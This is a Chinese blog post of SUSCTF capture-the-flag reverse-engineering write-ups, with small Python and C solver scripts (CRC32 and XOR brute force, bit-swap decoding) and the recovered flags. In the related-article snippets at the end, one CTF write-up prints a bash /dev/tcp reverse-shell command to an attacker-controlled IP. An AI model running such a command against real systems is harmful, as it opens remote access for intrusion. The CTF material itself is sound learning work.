SUSCTF re方向

最新推荐文章于 2025-03-13 11:23:06 发布
最新推荐文章于 2025-03-13 11:23:06 发布
阅读量549 收藏
点赞数
分类专栏: ctf 文章标签: 皮三宝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43487707/article/details/85181177
版权

SUSCTF re方向

ccc

这题主要考察的是crc嘛,上模板搞一下就行,目前还没搞懂crc加密。。。
看不懂鸭。。。

import binascii
import string

s = string.printable
flag = ''
crc = [3594606959,
  2158225808,
  3381484699,
  218476463,
  326279469,
  1566511483,
  1073871869,
  2815612267,
  2097478526,
  776112478,
  1640595123,
  2225816515,
  2680236509,
  4099485517]
for i in crc:
    for a1 in s:
        for a2 in s:
            for a3 in s:
                t = a1+a2+a3
                if i == binascii.crc32(flag+t)&0xffffffff:
                    flag += t
print flag

在这里插入图片描述

bitx

这题搞不懂为什么会有300分。。。
ida反编译后,吧数据dump下来直接解就行了
在这里插入图片描述
数据的话在0x804A040处

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

int main()
{
    char a[42] = {0x8F, 0xAA, 0x85, 0xA0, 0x48, 0xAC, 0x40, 0x95, 0xB6, 0x16,
  0xBE, 0x40, 0xB4, 0x16, 0x97, 0xB1, 0xBE, 0xBC, 0x16, 0xB1,
  0xBC, 0x16, 0x9D, 0x95, 0xBC, 0x41, 0x16, 0x36, 0x42, 0x95,
  0x95, 0x16,0x40, 0xB1, 0xBE, 0xB2, 0x16, 0x36, 0x42, 0x3D, 0x3D, 0x49};
  char i;
  for(i=0;i<42;i++)
  {
      a[i] = (((a[i] & 0xAA) >> 1)|(2*(a[i] & 0x55)))-9;
      printf("%c",a[i]);
  }
    return 0;
}

2018-rev

这道题目我是靠着脑洞搞完的。。。
解密只解密到了一半
动态调试,吧数据改成他想要的2018 1 1就行了
在这里插入图片描述
但是失败了啊
当然可以靠着脑洞写出来
FLAG{Happy New Year 2018 Keep Hacking EveryDAY!}
23333333333333
有空去弄懂他
看王师傅的wp也有点懵逼,感觉都能写啊

what-the-hell

这题又让我学到很多
比如使用z3
最后也是靠着爆破写的
感谢王师傅的wp
下面附上王骑驴的链接
https://blog.youkuaiyun.com/MozhuCY/article/details/82799170

unpackme

加壳了
拖进od,从开头的pushad
外加少许经验可以看出是upx壳
脱壳完后拖进ida
在这里插入图片描述
字符串里面有个假flag
直接忽视。。。
//东大的师傅太坏了
//害得我又白开心一趟
//哼!
字符串搜索然后慢慢看
在这里插入图片描述
v11的话我选择爆破出来
下面附上代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

int main()
{
    char a[]={0x34, 0xAF, 0x0D, 0x07, 0x4B, 0x17, 0xF4, 0x4D, 0x1B, 0xB9,
  0x39, 0x76, 0x5B, 0x02, 0x77, 0x6F};
    char b[]={0x1A, 0x8B, 0x24, 0x28, 0x58, 0x37, 0xAC, 0x52, 0x53, 0xB5,
  0x1E, 0x3E, 0x4A, 0x25, 0x4A, 0x27, 0x6B, 0xB2, 0x17, 0x01,
  0x03, 0x0B, 0xF4, 0x14, 0x00, 0xF1, 0x61, 0x70, 0x0C, 0x55,
  0x20, 0x7A};
    char c[34]={0};
    int i;
    char str;
    for(str=0;str<129;str++)
    {
    for(i=0;i<32;i+=4)
    {
        c[i]=str^b[i]^a[i&0xf];
        c[i+1]=str^b[i+1]^a[(i+1)&0xf];
        c[i+2]=str^b[i+2]^a[(i+2)&0xf];
        c[i+3]=str^b[i+3]^a[(i+3)&0xf];
    }
  if(!strncmp("FLAG{",c,5))
    {
        printf("%s\n",c);
        break;
    }
  }
    return 0;
}

FLAG{H0w dO yOU 7urn th1s 0n???}
下期预告
moctf
密码学写了
杂项写了点
re准备肛

CDUT新生赛wp re方向(逆向分析
weixin_47234647的博客
10-17 1507
给萌新们介绍介绍 re基础 必备工具: ida 逆向必备 不多说 jadx 安卓反编译 直接看逻辑 很好用 Androidkiller 安卓逆向 也可 但是没有反编译 PEiD:查壳 分析文件的 kali:一个系统 装虚拟机里面吧 里面好多工具也很好用 包括但不限于以上工具 前置知识: C语言基础 常见库函数你得懂吧 百度bing Google github等网站的搜索学习能力 各种常见算法 如异或 base系列 基本的排序啥的算法 汇编 RE必备 很难学 但是也得啃 可以看书 也可以看小甲鱼的视频
SUSCTF
weixin_44319142的博客
04-14 504
Crypto 哈夫曼树构造 根据flag格式试着去构造 11 000111 11 00010 000110 100 00001 01 11 101 01 11 101 0010 0010 101 11 01 101 01 11 0011 100 0011 0011 11 11 01 11 101 01 11 11 101 100 101 11 100 11 101 0010 01 11 01 1...
ALctf re方向知识点
liuxiaohuai_的博客
10-12 177
ALctf re方向知识点: 1、《用IDA64打开》 熟悉使用ida(ida下载链接链接:https://pan.baidu.com/s/1MLyv-JqTrbAnH19APwxqDg 提取码:4314 ) 2、《贪吃蛇想长大》 这个题会遇到上图这样的报错,需要你学会如何解决这样的报错,并学会使用ida查看伪c代码,并分析伪c代码。 3、《快乐迷宫》 这个题需要使用ida查看伪c代码,并对c语言有一定的基础,能够分析出代码的功能。 ...
CTF 六大方向基础工具合集(非常详细),零基础入门到精通,看这一篇就够了
最新发布
wly55690的博客
03-13 1007
今天来为大家分享CTF 六大方向基础工具简介集合:杂项往往是不能被归到其他类别里的题目,所以什么样的题都有,工具也很杂。主要的分类有:1、视频音频图片类Stegsolve.jar一款图像隐写工具,支持使用不同方式解除图像隐写,是图像隐写的必备工具。可以破解色道隐写等,需要JAVA环境。QR_Research.exe用于扫描二维码,有些题目需要自己准备二维码定位角图用p图工具p上去。Audacity.exe运行于windows的常用音频隐写工具outguess(linux)开源隐写算法,支持各种格式的文件,C
re学习笔记(56)WUSTCTF - Re方向WP
逆向随笔
03-30 1285
WUSTCTF-re-Cr0ssFun IDA64载入,进入main函数 查看check函数 都提取出来就是flag了。。。 得到flag为wctf2020{cpp_@nd_r3verse_@re_fun} WUSTCTF-re-level1 下载下来压缩包有两个文件,一个是ELF64位,一个是output.txt是程序的输出 IDA64位载入查看main函数 对19位的flag...
SUSCTF re方向部分wp
皮三宝好菜的博客
12-21 738
SUSCTF re方向部分wp 1.Helloworld 拖进ida 方法很简单鸭直接上代码了,需要稍加注意小端序。 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;time.h&gt; int main() { int a[28]={0xF1, 0xE8,...
SUSCTF 2018 做题记录
0verWatch的博客
06-05 7234
前言 最近好久都没做题目,刚好上次搭的题目还在,就不要浪费了,记录记录做题过程吧 正文 minBash 这个题目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示 -rbash: ls: command not found 发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕...
SUSCTF2022 Writeup:Dest0g3 Team的Java挑战解析
作者Dest0g3分享了在SUSCTF2022比赛中遇到的一些挑战和解决方法,其中涉及到Java反序列化漏洞的利用。 首先,讨论的是一个名为"babygadgetv1.0"的Web题目。作者最初认为这可能是一个涉及Tomcat服务器和EL...
SUSCTF|WP:CrakeMe 一道android逆向
BadRer的博客
04-01 891
前言可能是第一次单字节手动爆flag开始这题是一个涉及到so动态调试的apk。我之前都是用红米note来进行动态调试的,因为android4.4感觉脱壳比较容易,但这次的版本要求为api 26也就是android8.0.这就有点蛋疼了,还好我自己用的手机够格,所以就拿自己手机上了。先是搭了一波环境,64位32位搞不清了都,ida附加了半天没附加上去,最后使用64位来调的。 check1函数的过
2018SUCTF部分wp
Risker
05-28 3034
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
2018 SCUCTF web题:cat?非常规题解
博客
12-19 1884
主要思路 1.寻找可以写入的目录 2.通过 &gt; 构造文件名,在通过 ls -th&gt;g 将命令写入文件 3.通过bash -i &gt;&amp; /dev/tcp/你的公网ip/监听的端口 0&gt;&amp;1构造反弹shell 4.在服务器使用 "nc -lnvp 相应端口" python脚本如下 # -*- coding: utf8 -*- import requests im...
susctf-put
a3uRa的一个窝
06-05 407
put一个message postman base64解密即可
SUSCTF rain
sky123博客
03-03 784
分析代码 main void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int num; // [rsp+14h] [rbp-Ch] int *info; // [rsp+18h] [rbp-8h] sub_401D2F(a1, a2, a3); while ( 1 ) { info = init_info(); while ( 1 ) { while ( 1 )
[SUSCTF]fxxkcors(CSRF提权)
Landasika的博客
05-17 390
首先注册登陆后发现 审计changepermission中的源码可以发现 这个地方需要我们提交一个usename的js表单进行用户提权, 根据题目的意思,我们需要提权之后才能看到flag。 首先用bp直接提交表单试试,结果发现这个地方需要admin的用户才能提权,那么我们需要进行CSRF让服务器给我们提权。 再分析report界面的js代码 const opt = { name...
SUSCTF 2022 happytree
weixin_46483787的博客
02-28 548
首先要做的是理解程序的功能 三个功能,add,del和show 每次add,首先会申请一个0x20大小的chunk,用来存放控制信息 结构大概如此: 申请堆块时的控制堆通过左右孩子指针能够形成一个树型结构 有一个头结点指针存在bss中,然后每次申请会根据size大小来决定其控制堆在树上的位置 本题漏洞在于: 删除以及添加的时候没有清空控制堆内容,这就使得左右孩子指针会残留,而free的时候并没有对左右孩子指针进行任何检测,libc版本也是2.27,所以可以直接进行double free 大致的做题过程为
2019SUSCTF安德门
OIqng的博客
08-02 355
读题 在南京地铁一号线运行途中,一个1在鼓楼上车,一个1在新街口上车。过了安德门站之后,只剩一个1了,为什么?flag提交格式SUSCTF{} 审题 and运算 提供 flag_a: SwsKu鐊~_??鈝ww? flag_b: [誗鉚F0t{Os遤輙_镹d} 解题 题目描述提示的是and门,也就是与运算。 文件需要用二进制读写,每个字节按位与就能得到flag。 python解法 f = open('flag.txt','rb') a = f.readline()[8:] b = f.read
SUSCTF 2022 rain
weixin_46483787的博客
02-28 618
首先理解程序的结构,三个功能,一个编辑config,一个打印config,一个rain,其中config用的是realloc来申请,realloc中的size参数,是你写入的config的大小-18 realloc存在UAF,当size为0,即输入的config大小恰为18的时候,realloc(ptr,0)的效果等同于free(0),所以只需要先利用realloc申请一个不在fastbin里的东西,然后free 8 次,再申请回来一次,就可以泄露libc 接下来利用realloc导致的double fre
SUSCTF2022 tttree
sky123博客
03-12 2726
首先将 0x140010074 ,0x140017EFA ,140018C67 起始处的数据转换为汇编。 观察汇编,发现很多代码块之间相互跳转,因此先按照 retn 划分代码块。 代码块中存在大量类似 push rcx;pop rcx 的无用操作,将其去除后继续分析。 def simplify_asms(asms): left_asms = [] for asm in asms: if asm.startswith("pop") and len(left_asms)
SUSCTF2022 Misc
mumuzi的博客
03-01 2395
Misc就两个字 无语 文章目录Misccheckinra2TannermisoundAUDIOReDigitalCircuits Misc checkin ra2 下载下来是红警2,由于不是exe打开的,因此地图编辑器没用。打开游戏之后发现有个mission,是和 flag有关的,于是用notepad++全局搜一下mission里面的内容,找到ctf-01 其中发现规则是在ctf-01.lua当中,因为难度只有后两个,所以修改一下 然后发现白天只有30s,于是再修改成120s(事实上应该改贼大的一个数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值